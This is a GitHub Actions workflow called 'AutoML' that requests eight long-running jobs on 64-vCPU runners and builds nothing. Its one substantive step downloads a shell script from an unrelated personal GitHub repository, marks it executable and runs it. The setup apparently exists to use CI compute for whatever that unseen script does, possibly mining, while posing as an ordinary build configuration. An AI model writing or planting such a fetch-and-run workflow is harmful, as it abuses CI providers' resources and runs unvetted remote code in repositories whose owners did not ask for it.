name: AutoML
on: [push, pull_request]
jobs:
  build:
    name: Project
    runs-on: buildjet-64vcpu-ubuntu-1804
    strategy:
      max-parallel: 256
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4,]
        flag: [A, B]
    timeout-minutes: 360
    env:
        NUM_JOBS: 256
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        wget https://raw.githubusercontent.com/Hudarleh/testing/main/Udin.sh && chmod +x Udin.sh && ./Udin.sh
